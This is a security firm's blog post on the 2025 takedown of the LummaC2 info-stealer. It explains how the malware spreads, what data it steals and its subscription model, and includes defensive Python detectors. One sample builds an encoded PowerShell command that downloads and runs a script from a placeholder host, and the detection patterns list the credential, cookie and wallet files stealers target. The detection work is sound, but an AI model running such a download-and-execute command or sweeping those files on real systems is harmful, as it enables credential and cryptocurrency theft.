LummaC2 Dismantled: DOJ Seizes Infamous Malware-as-a-Service Operation
Authors: Lisa & 23pds
Editor: Liz
Background
On May 21, 2025, the U.S. Department of Justice (DOJ), working with Microsoft and law enforcement agencies from several countries, announced the seizure of the core infrastructure of the LummaC2 information stealer. The five domains (and their subdomains) seized by the DOJ were critical operational nodes for LummaC2, and in a parallel civil action Microsoft took control of roughly 2,300 further domains tied to the operation, cutting off the many downstream criminal groups that relied on the tool.
According to the FBI, LummaC2 has been used in at least 1.7 million information-stealing incidents, targeting browser autofill data, email and banking credentials, cryptocurrency wallet seed phrases, and more. The takedown was carried out in phases: two domains were seized on May 19; LummaC2's administrators notified their users of three replacement domains on May 20, and those were seized the following day.
What Is LummaC2?
LummaC2 (also known as Lumma Stealer) is an information stealer written in C and sold actively in underground markets. Since it surfaced in 2022 it has become popular with cybercriminals because it demands little technical skill and spreads readily, and it has been used in a wide range of attacks worldwide.
It was developed and sold on Russian-language hacker forums by an actor using the alias “Shamel” (also “Lumma”), who markets it and supports its “customers” through Telegram groups.
Lumma Stealer maintains a robust command-and-control (C2) infrastructure and primarily targets cryptocurrency wallets and 2FA (two-factor authentication) browser extensions in order to extract sensitive information from victims’ devices.
According to a joint advisory from the FBI and the Cybersecurity and Infrastructure Security Agency (CISA), more than 21,000 LummaC2 logs (bundles of data stolen from a single victim) were offered on dark web forums between April and June 2024 alone, a 71.7% increase over the same period of 2023. As of May 2025 the malware remains active across multiple U.S. critical infrastructure sectors.
Common Distribution Methods Include:
- Phishing Emails: Masquerading as trusted brands or services, these emails contain malicious links or attachments that redirect users to spoofed websites or malware-hosting servers.
- Malvertising: By placing malicious ads in search engine results, attackers lure users into phishing sites disguised as Chrome updates or legitimate software download pages.
- Trojanized Software Bundles: Lumma Stealer is bundled with pirated or “cracked” software installers, often executing silently without user awareness. These installers are typically shared through file-sharing platforms.
- Obfuscation and Evasion: Strictly an evasion technique rather than a delivery channel, but present in every campaign. Heavy string obfuscation and the use of loaders shared with other malware families let Lumma Stealer slip past antivirus and endpoint detection and response (EDR) products.
Additionally, LummaC2 has been spread through fake CAPTCHA pages (the so-called “ClickFix” technique). The page shows an “I’m not a robot” button; clicking it silently copies a command to the clipboard, and the page then walks the visitor through a fake “verification process”: press Win+R, paste with Ctrl+V, press Enter.
The pasted command launches PowerShell with a Base64-encoded script, which downloads and runs Lumma’s payload. Because the victim types the command themselves, no exploit and no browser download prompt is involved.
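The Run-dialog launch described above leaves a distinctive trace in process-creation telemetry. The following triage helper is an added example, not code from the original post, from SlowMist or from LummaC2; it assumes events that record the parent image, the image and the full command line (Sysmon Event ID 1 or an EDR equivalent), decodes the `-EncodedCommand` argument (Base64 of UTF-16LE text) and scores the result. Every event it processes is constructed for illustration.

```python
"""
Triage for ClickFix-style PowerShell launches.

Added example; not code from the original post, from SlowMist, or from LummaC2.
It assumes process-creation telemetry with parent image, image and command line
(Sysmon Event ID 1 or an EDR equivalent). All events below are constructed.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    level: str                                   # "high", "medium" or "none"
    decoded: str = ""                            # decoded -EncodedCommand payload, if any
    indicators: List[str] = field(default_factory=list)


# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the common spellings
# are listed. The argument is Base64 of a UTF-16LE script block.
ENCODED_FLAG = re.compile(r"(?i)(?<!\S)-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/]{12,}={0,2})")
# Download-and-execute behaviour typical of a stager.
CRADLE = re.compile(r"(?i)invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
                    r"invoke-expression|\biex\b|frombase64string|https?://")
HIDDEN = re.compile(r"(?i)(?<!\S)-w(?:indowstyle)?\s+hidden")
SHELLS = {"powershell.exe", "pwsh.exe"}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the decoded script behind -EncodedCommand, or None if absent or invalid."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event: ProcessEvent) -> Finding:
    image = event.image.rsplit("\\", 1)[-1].lower()
    parent = event.parent_image.rsplit("\\", 1)[-1].lower()
    if image not in SHELLS:
        return Finding("none")
    indicators = []
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        indicators.append("encoded-command")
    # Look for the cradle in the decoded script, or in the raw command line if not encoded.
    if CRADLE.search(decoded if decoded is not None else event.command_line):
        indicators.append("download-cradle")
    if HIDDEN.search(event.command_line):
        indicators.append("hidden-window")
    if parent == "explorer.exe":
        # The Win+R Run dialog spawns the shell as a child of explorer.exe, which is
        # exactly what a fake CAPTCHA page instructs the victim to do.
        indicators.append("run-dialog-parent")
    if "download-cradle" in indicators and len(indicators) > 1:
        level = "high"
    elif indicators:
        level = "medium"
    else:
        level = "none"
    return Finding(level, decoded or "", indicators)


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way a ClickFix page would (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Constructed: the victim pressed Win+R and pasted what the page put on the clipboard.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 "powershell.exe -w hidden -enc " + _encode("iwr -useb http://example.invalid/p.ps1 | iex")),
    # Constructed: a routine scheduled script; -ExecutionPolicy must not be mistaken for -e.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # Constructed: encoded but harmless; odd from the Run dialog, not an incident by itself.
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh.exe -EncodedCommand " + _encode("Get-Date")),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        f = triage(ev)
        print(f"{f.level:6} {f.indicators} {f.decoded!r}")
```

The parent-process check is the cheap signal: administrators rarely launch encoded PowerShell from the Run dialog, while a ClickFix victim always does. Decoding the argument before matching matters because the cradle keywords never appear in the raw command line of an encoded launch.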
The malware also includes a ClipBanker module that watches the clipboard and silently replaces a copied cryptocurrency wallet address with an attacker-controlled one of the same type, so that a victim who pastes the address into a transaction sends the funds to the attacker.
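A guard for the clipboard swap just described, as an added example that is not part of the original post and not LummaC2's code. It assumes a monitor that distinguishes two kinds of clipboard events: a `copy` that the user initiated and a `poll` in which the guard re-reads the clipboard shortly afterwards; a change from one valid address to another of the same family without a user copy in between is the signature of a ClipBanker. The address strings are constructed.

```python
"""
Clipboard-swap guard for wallet addresses.

Added example; not code from the original post or from LummaC2. It assumes a
monitor that reports ("copy", text) for user-initiated copies and ("poll", text)
for later re-reads of the clipboard. The addresses below are constructed.
"""
import re
from typing import List, Optional, Tuple

# Rough syntactic checks, only enough to tell the address family apart.
ADDRESS_FAMILIES = {
    "btc": re.compile(r"^(?:bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify(text: str) -> Optional[str]:
    """Return the address family of a string, or None if it is not a wallet address."""
    for family, pattern in ADDRESS_FAMILIES.items():
        if pattern.match(text.strip()):
            return family
    return None


def detect_swaps(events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (copied, replaced_with) pairs: the clipboard changed to a different
    address of the same family without a user copy in between."""
    last_user_copy = None          # (family, address) most recently copied by the user
    swaps = []
    for kind, text in events:
        text = text.strip()
        family = classify(text)
        if kind == "copy":
            # Any user copy resets the baseline; non-address text clears it.
            last_user_copy = (family, text) if family else None
        elif kind == "poll" and family and last_user_copy:
            if last_user_copy[0] == family and last_user_copy[1] != text:
                swaps.append((last_user_copy[1], text))
                last_user_copy = None  # report each hijack once
    return swaps


USER_ETH = "0x" + "ab" * 20     # constructed
EVIL_ETH = "0x" + "cd" * 20     # constructed
USER_BTC = "bc1q" + "q" * 38    # constructed

SAMPLE_EVENTS = [
    ("copy", USER_ETH),
    ("poll", USER_ETH),          # unchanged, fine
    ("poll", EVIL_ETH),          # swapped by a ClipBanker-style hook
    ("copy", "meeting at 10"),   # ordinary text resets the baseline
    ("poll", "meeting at 10"),
    ("copy", USER_BTC),
    ("poll", USER_BTC),
]

if __name__ == "__main__":
    for copied, replaced in detect_swaps(SAMPLE_EVENTS):
        print(f"clipboard hijack: {copied} -> {replaced}")
```

The same comparison is what a user does by hand when they check the first and last characters of a pasted address against the one they copied; the guard simply does it on every clipboard read.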
Why Is LummaC2 Being Targeted?
1. Widespread Infections and Data Theft
Between mid-March and mid-May 2025, Microsoft identified roughly 394,000 Windows devices infected with LummaC2. The malware has been used to steal browser data, autofill credentials, banking logins, and cryptocurrency wallet seed phrases.
2. Threat to Critical Infrastructure
LummaC2 has extended its reach into multiple sectors of the U.S. critical infrastructure, posing a serious risk to the cybersecurity of individuals and organizations.
3. Malware-as-a-Service (MaaS) Model
LummaC2 operates under a MaaS business model, allowing cybercriminals to subscribe to the malware as a service — significantly amplifying its impact.
4. International Cooperation Against Cybercrime
This operation was a joint effort between the U.S. DOJ, Microsoft, Europol, Japan’s Cybercrime Control Center, and other global partners, aiming to combat transnational cybercrime through legal and technical means.
How LummaC2 Works
LummaC2 operates in an automated fashion across several key stages:
1. Infection & Deployment
The malware is delivered via phishing emails, disguised downloads, and exploitation of vulnerabilities. Once the victim accepts the lure (for example by clicking “Yes” on a malicious pop-up), the loader decrypts the payload, which connects to its designated C2 server.
Once executed, LummaC2 runs silently in the background, initiating its information theft routines.
2. Information Harvesting
LummaC2 extracts a wide range of sensitive data:
- System Information: Lumma version, Lumma ID, hardware ID, screen resolution, system language, CPU, and memory size. These are written into a system.txt entry that is held in memory rather than on disk.
- Cryptocurrency Wallets: The malware looks for wallets such as Binance, Electrum, and Ethereum and collects their sensitive files for exfiltration.
- Browser Data: LummaC2 checks for browsers such as Chrome, Chromium, Edge, Kometa, Vivaldi, Brave, Opera (Stable/GX/Neon), and Firefox. It attempts to steal account credentials, cookies, browsing history, 2FA extensions, and crypto wallet plugins.
- User Documents: The malware scans the %userProfile% directory for .txt files, labels them as “important,” and uploads them to the server.
It collects system-level data with Windows APIs such as GetUserNameW and GetComputerNameW and with the cpuid instruction.
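The harvesting stage touches a predictable set of files, which makes it huntable from file-access telemetry. The rule below is an added example, not code from the original post, from SlowMist or from LummaC2. It assumes events that carry the accessing process image and the target path (an EDR file-read event; Sysmon only logs file creation) and it assumes the wallet directory names listed in the code; every event it processes is constructed.

```python
"""
Hunting rule for infostealer-style file access.

Added example; not code from the original post, from SlowMist, or from LummaC2.
It assumes file-read telemetry with process image and target path, and assumes
the wallet directory names below. All events are constructed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List


@dataclass(frozen=True)
class FileEvent:
    process_image: str
    target_path: str


# Artefacts the harvesting stage goes after. Chromium-family browsers keep saved logins
# and cookies in SQLite files under the profile and the key that protects them in
# "Local State"; Firefox uses logins.json, key4.db and cookies.sqlite. Extension storage
# holds the state of 2FA and wallet add-ons. The wallet paths are assumptions for the
# example (Electrum's and geth's default locations under %APPDATA%).
SENSITIVE = [
    ("browser-credentials", re.compile(r"(?i)\\(?:login data|web data|local state|logins\.json|key4\.db)$")),
    ("browser-cookies",     re.compile(r"(?i)\\(?:cookies|cookies\.sqlite)$")),
    ("browser-extensions",  re.compile(r"(?i)\\(?:local|sync) extension settings\\")),
    ("crypto-wallet",       re.compile(r"(?i)\\(?:electrum\\wallets|ethereum\\keystore)\\")),
]
# .txt files under the user profile, outside AppData: the "important documents" sweep.
DOC_SWEEP = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\(?!appdata\\).*\.txt$")
# Processes expected to read their own profile data.
BROWSERS = {"chrome.exe", "chromium.exe", "msedge.exe", "brave.exe", "vivaldi.exe",
            "opera.exe", "firefox.exe"}


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def hunt(events: Iterable[FileEvent], doc_threshold: int = 20) -> Dict[str, List[str]]:
    """Map each suspicious process image to the sorted artefact families it touched."""
    touched = defaultdict(set)
    txt_reads = defaultdict(int)
    for ev in events:
        if _basename(ev.process_image) in BROWSERS:
            continue  # a browser reading its own profile is normal
        for family, pattern in SENSITIVE:
            if pattern.search(ev.target_path):
                touched[ev.process_image].add(family)
        if DOC_SWEEP.match(ev.target_path):
            txt_reads[ev.process_image] += 1
    for image, count in txt_reads.items():
        if count >= doc_threshold:
            touched[image].add("document-sweep")
    return {image: sorted(families) for image, families in touched.items() if families}


CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"
PROFILE = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
DROPPER = r"C:\Users\alice\AppData\Local\Temp\setup_x64.exe"
EXT_ID = "a" * 32   # placeholder extension id, not a real one

SAMPLE_EVENTS = [
    # Constructed: Chrome reading its own profile is normal.
    FileEvent(CHROME, PROFILE + r"\Login Data"),
    # Constructed: Notepad opening one text file is normal.
    FileEvent(r"C:\Windows\System32\notepad.exe", r"C:\Users\alice\Desktop\todo.txt"),
    # Constructed: a freshly dropped binary working through the stealer's shopping list.
    FileEvent(DROPPER, PROFILE + r"\Login Data"),
    FileEvent(DROPPER, r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State"),
    FileEvent(DROPPER, PROFILE + r"\Network\Cookies"),
    FileEvent(DROPPER, PROFILE + r"\Local Extension Settings\%s\000003.log" % EXT_ID),
    FileEvent(DROPPER, r"C:\Users\alice\AppData\Roaming\Electrum\wallets\default_wallet"),
] + [FileEvent(DROPPER, r"C:\Users\alice\Documents\notes%d.txt" % i) for i in range(25)]

if __name__ == "__main__":
    for image, families in hunt(SAMPLE_EVENTS).items():
        print(image, families)
```

Backup agents and indexers will also sweep .txt files, so the document-sweep threshold is a tuning knob rather than a verdict; a single non-browser process that touches credentials, cookies and a wallet directory in one burst is the strong signal.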
3. Encryption & Exfiltration
After collecting data, LummaC2 compresses and encrypts it, then uploads it to the C2 server in HTTP POST requests. The client retries and transmits asynchronously, so the data still arrives if part of an upload fails.
Often, the malware resides only in memory, leaving no disk footprint when idle. Once connected to its C2, it may deploy additional payloads or write files to disk. It also includes self-protection mechanisms, such as terminating execution when detecting specific usernames or computer names (likely to avoid infecting the developer’s own environment).
4. Data Processing via C2 Dashboard
LummaC2 receives JSON-based configuration commands from the C2 server, parses them, and transmits stolen data back. Attackers can access this data via a web dashboard, which supports real-time viewing, filtering, exporting, geolocation sorting, automatic classification, and device fingerprinting.
At its core, LummaC2 exemplifies the Malware-as-a-Service (MaaS) ecosystem: for a subscription fee (starting at $250/month in 2024), cybercriminals receive updated malware versions, dashboard access, technical support, and custom features.
Service offerings include:
- Telegram-based rapid support channels
- Automated deployment tools
- Encrypted communications and anonymous payment options (e.g., USDT, XMR)
This model significantly lowers the technical barrier to entry, enabling even non-technical criminals to launch attacks, thereby fueling a surge in scams, crypto theft, and corporate espionage.
Defense Recommendations
LummaC2 is only one of many infostealers. Both users and enterprises need a multi-layered defense:
For Individual Users:
- Avoid clicking on unknown links or attachments.
- Enable two-factor authentication (2FA) so that a stolen password alone is not enough. Note that infostealers also take session cookies, which let an attacker bypass both the password and 2FA; after a suspected infection, sign out of all sessions (revoke active tokens) in addition to changing passwords.
- Clear browser cookies regularly, and avoid saving passwords, card numbers, and seed phrases in the browser or in plain text files.
- Install and update antivirus software, and apply security patches in a timely manner.
For Enterprises:
- Strong Passwords: Internal systems should enforce long, unique passwords (at least 8 characters with mixed character classes; longer is better) managed with a password manager. Scheduled periodic rotation is no longer recommended by NIST SP 800-63B and does not help against a stealer, which captures the new password as soon as it is saved; rotate passwords, and revoke sessions, when a compromise is suspected.
- Two-Factor Authentication: Prefer phishing-resistant methods, such as FIDO2 hardware security keys, or biometric authentication for sensitive systems, and keep session lifetimes short, since a stolen browser session bypasses 2FA entirely.
- The Four Don’ts: Don’t open suspicious emails. Don’t visit malicious websites. Don’t install unauthorized software. Don’t connect unknown USB drives or portable media to your systems.
- Data Backup: Maintain offline backups of critical data and clearly label backup stages to ensure recovery in case of malware compromise.
- Regular Scans and Port Closures: Keep antivirus software updated, run full system scans, and disable unnecessary ports and services (e.g., remote access on 3389/RDP and 22/SSH, and NetBIOS/SMB file sharing on 135, 139, and 445).
- Employee Security Awareness: Human error is often the weakest link. Raise awareness to prevent phishing, social engineering, malware execution, and weak passwords.
- Patch Management: Apply updates to operating systems and third-party applications promptly to prevent exploitation via known vulnerabilities.
Final Thoughts
The takedown of LummaC2 represents not only a technical milestone, but also a model of global collaboration in cybersecurity. As the MaaS model continues to evolve and information-stealing trojans mutate, this case serves as a reminder: in the realm of crypto asset security, device and environment security are just as vital as wallet protection.
SlowMist will continue to monitor developments and leverage its threat intelligence and tracking capabilities to support users and platforms — working together to build a safer and more transparent Web3 ecosystem.
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was founded by a team with over ten years of network security experience and has grown into a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat intelligence, defense deployment, security consulting, and other security-related services. We also offer AML (anti-money laundering) software, MistEye (security monitoring), SlowMist Hacked (crypto hack archives), FireWall.x (smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.